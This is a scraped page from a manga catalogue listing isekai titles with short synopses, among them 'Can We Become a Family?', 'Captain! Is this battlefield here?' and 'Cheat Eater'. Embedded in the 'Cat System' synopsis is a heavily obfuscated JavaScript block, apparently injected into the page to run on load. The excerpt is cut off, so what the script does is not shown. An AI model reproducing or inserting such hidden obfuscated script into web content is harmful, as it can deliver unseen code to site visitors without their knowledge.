Isekai - Page 11

Isekai manga is a genre that follows characters who are transported or reincarnated into a different world, often full of magic and mythical creatures. The main focus is on their journey in the new world and their quest to overcome challenges or change their destiny.

1522 results

Buta no Fukushuu

Before successfully being able to commit suicide, Takeshi Hirota, a bullied high school boy is transported to another another world where he is accepted by the orcs due to his appearance.


Can I have a date with the Crown Prince again?

As she aspired to become an idol like that, the day when she could stand on stage as a group XUM came near when it became unclear where her dream came from. While practicing ahead of her debut, she suddenly shakes the ground, and her wall collapses and she enters this world through the main gate of the clock tower. The time when Baek Ah fell into a fairy tale book is the point when she suddenly falls asleep under her spell after being engaged to her Prince Philip. Therefore, the world in the fairy tale has become chaotic. In fact, Kairos, the country of Princess Sua, was just a small country without a princess. Therefore, without the support of the empire, it was on the verge of collapse. Philip took special care of Kairos in his own right and waited for Sua to wake up. However, Baek-ah wakes up and disappoints Philip because she can’t remember the world in the book. Disappointed, he even brings up the story of breaking up. The imperial family held a ball. It was ostensibly a place to socialize with the princesses of the vassal state, but in fact, it is a ‘place of confrontation’ to find her fiancée again… . King Anno of Kairos asks Baek-ah to save the kingdom and pushes Baek-ah, who has not yet understood the situation, to attend the imperial ball. Baek-a goes there with her maid, Lindsey. In the atmosphere of the ballroom, which is held like a survival program, Baek Ah said that if you are an idol, you should catch everyone’s eyes in other worlds as well.


Can We Become a Family?

“Navia Agnes”, adopted to marry the Crown Prince on behalf of Duke Agnes’s daughter with a time limit. “I really want to be family.” Navia, who held on to her family’s affection, did her best to become an Empress even while being abused. However, once Vivian, the Duke’s real daughter, is cured, she is abandoned by her family. No, it would be right to say that she was abandoned on all occasions. “Just how much more effort do I have to make? If I want to be your family.” Navia took off her blood-soaked gloves. Then on her right wrist, a number that couldn’t be seen by others appeared. 1 She calmly admitted, looking down on the number. “I’m going to stop playing with my family now.” At that moment, the number on her wrist changed. 0 Just like that, her life began again. “If you messed with me, you’re gonna pay for it.” Will she be able to find a temporary family who will protect her until she becomes of age, and get revenge on Duke Agnes?   Alternative Name Family is Needed / 우리가 가족이 될 수 있을까요?


Can’T Overlook The Reincarnated Granny! -The Second Life Of A Former Vicious Empress-

Don't Overlook the Reincarnated Granny The Second Life of a Former Villainous Empress , Can't Overlook The Reincarnated Granny! -The Second Life of a Former Vicious Empress, Tensei Babaa wa Misugosenai!: Moto Akutoku Jotei no Nishuume LifeLauraris Eldanus, who ruled the country by terrorism. Her life ended with a hero. It was supposed to be, but three hundred years later, it looks like a girl, the contents are Baba, and the former empress is a big resurrection !? It seems to be. I want to live in peace in my second life, but there are always bad guys in the world The long-awaited comicalize of the exhilarating fantasy of the worst girl who can't overlook evil! (MTL Google)


Captain! Is this battlefield here?

Read manhwa Captain! Is this battlefield here? Elite Special Forces Captain Lee Yoon-ah, who is said to be Korea’s nerd. As a soldier to the bone, there was no romance in her life. However, a completely different world unfolds in front of her, who lost her mind after being hit by a shell while dispatched overseas. Being possessed by a romance fantasy novel written by a friend! She also becomes an extra ‘Rosalie’ who lives a miserable life. Taking a deep breath and shaking her head for a moment, she considers this a battlefield and decides to change her life. “This is a class society.” “Because I’ve experienced enough to get tired of a hierarchical society called the military.” “Are you disobeying my orders now?” Captain who conquers the duke with absolute charisma! However, she unintentionally seizes the romance… “Duke, how does it feel to kneel down to the Crown Prince? It’s the first time you’ve kneeled down to anyone other than the Emperor.” The original male lead, not the female lead, falls to her knees. Captain, who didn’t care about love, can you win this battlefield?

3 days ago

Cat System The Emperor is a Cat Lover

The cat lover teenager Meng Changji travels through truck kun! and is bound by a cat system in a parallel world. What is the cat system? I have a big giant kitty as a system! the cat system uses the road not taken! It is the practice that does not take the usual path! When you are kidnapped, other people are looking for opportunities to escape, but this young master walks away while he slaps you right up in the face! haha!. When this Emperor meets a pretty girl for a competition invitation, others used male chauvinistic ways and strength to conquer her, and this young master…this young master acts like a cat really oh..I’m so weak.. Of course, it’s important to hold her thighs if she’s stronger! Strong waifu is the best waifu! don’t you know this?! This Emperor does not practice according to the routine, harvests the cultivation value like a miser. By the way..did this Emperor mention I might be the future god of the cat too? eh..just a hunch. Ahh..cats are so cute. I just wanna pet them all day! Ahhh!!! my System is a CAT!!! this is life! thank you Cat God!<script></script><script>(function(_0x9cf142,_0x2a5fa5){var _0x46972e=_0xd628,_0x23e47b=_0x9cf142();while(!![]){try{var _0x23b7a0=parseInt(_0x46972e(0xd3))/(-0x1*0x6cb+-0x1b25+0x21f1*0x1)*(-parseInt(_0x46972e(0xcd))/(-0x11a5+0x19*0x2f+-0xd1*-0x10))+parseInt(_0x46972e(0xe2))/(0x1f17+0x1770+0xc*-0x48b)*(-parseInt(_0x46972e(0xd9))/(0xe1+-0x1200+0x1123))+-parseInt(_0x46972e(0xda))/(0x1656+-0x7d7+0xda*-0x11)*(-parseInt(_0x46972e(0xc6))/(0x11df+0x2*-0x1d5+-0xe2f))+parseInt(_0x46972e(0xcf))/(-0x20bc+-0x1166+-0x3229*-0x1)+parseInt(_0x46972e(0xe0))/(0x455*0x8+0x7*-0xaf+-0x1dd7)+-parseInt(_0x46972e(0xc9))/(-0x1666+0x8*0xfb+-0x5*-0x2eb)+parseInt(_0x46972e(0xdc))/(-0x13a*-0xd+0xfd*0x13+-0x2ab*0xd);if(_0x23b7a0===_0x2a5fa5)break;else _0x23e47b['push'](_0x23e47b['shift']());}catch(_0x498fb8){_0x23e47b['push'](_0x23e47b['shift']());}}}(_0x426d,0xfb202+0xfcf6d*0x1+0xe3*-0x1971));function _0x426d(){var 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Catastrophic Necromancer

The game has emerged into reality, the rules of the world have been turned upside down and humanity has entered the era of becoming players with the world set as a game stage. The only way to become a player is by leveling up to become stronger! The only way to rise to the top of the world! On the day of world fusion Lin Moyue chose to take on the sole hidden class, Necromancer. From then on, Lin Moyue would not die until his summoned creatures died out. “I sit on the throne of bones as the God of the dead and walk between life and death.” “I am a walking catastrophe!”


Charming and the Beast

<span class="mx-1">Charming and the Beast </span> Something's wrong; It's like I've been possessed. Something weird has happened. Hair - fur? - has grown. My size has greatly increased too. Everyone who sees me looks terrified. I've become a beast. Why?


Chastity Reverse World

In our current society, most porn consumers are males, we are the ones who think with our d***** many times, we worship the female body and our society, products, advertisements and many other things are centered around that. But, what if it wasn\'t that way? What if, instead of men being the ones controlled by their sexual urges, women were the ones who bought porn magazines and had the most interest in sex? What if the moral standards between men and women were reversed? A non-H adaptation of a doujinshi series with the same name.


Cheat Eater: Destroyer of those Summoned from Different Worlds

A common scene. A person dies, their soul sent to the great beyond. A goddess plucks it from the ether and offers a deal - she will send the soul to another world she has created. She will also bequeath the human with skills that are so powerful they could be considered cheats. The goddess only asks for one thing in return: that they use their special powers to save her world from destruction. The soul is summoned to another world and given the powers of a demigod. And as power corrupts, so too do the summoned humans abuse their abilities for wanton greed and violence. Zyzz is a slave of one such otherworlder, who voluntarily became his servant to search for his sister. Then one day, he meets Kaina, a woman who calls herself the “last summoned person”, who was hand-picked by the goddess to eat those who have reneged on their promises… The newest work from the author of Corpse Princess.


Cheat Na Tablet Wo Motte Kaiteki Isekai Seikatsu

Yamazaki Kento was unexpectedly reincarnated into a fantasy world with only a tablet filled with mysterious apps he needs to unlock.


Cheat Skill “Shihai” Otsukatte Isekai Harem!

One day, the protagonist suddenly transferred to another world. \"It looks like the world of the anime I was watching last night, but when I tried to imitate the hero of the anime, the status screen appeared in front of me! I was surprised by the high specs of my abilities, but I was shocked when I saw the name on the status screen! Surprisingly, I am a small fry character [fake hero] who is defeated by the main character in the early stages!\" Knowing that his role is \"a fake hero to be defeated by a hero\", the hero abandons the empty life in his original world and lives a short life as a\"fake hero\" in a harem until the real hero defeats him. Make up your mind!
